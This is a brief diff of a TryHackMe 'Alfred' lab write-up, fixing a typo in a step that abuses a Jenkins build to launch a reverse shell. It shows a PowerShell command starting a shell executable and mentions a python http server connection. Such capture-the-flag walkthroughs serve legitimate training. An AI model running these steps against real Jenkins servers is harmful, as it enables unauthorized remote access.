sebastiendamaye/TryHackMe/Alfred/readme.md

 * You should see the connection from the python http server
 * You can check the console output from Jenkins

-Do another build with this payload to start the rever shell:
+Do another build with this payload to start the reverse shell:

 ~~~
 powershell -command "Start-Process shell.exe"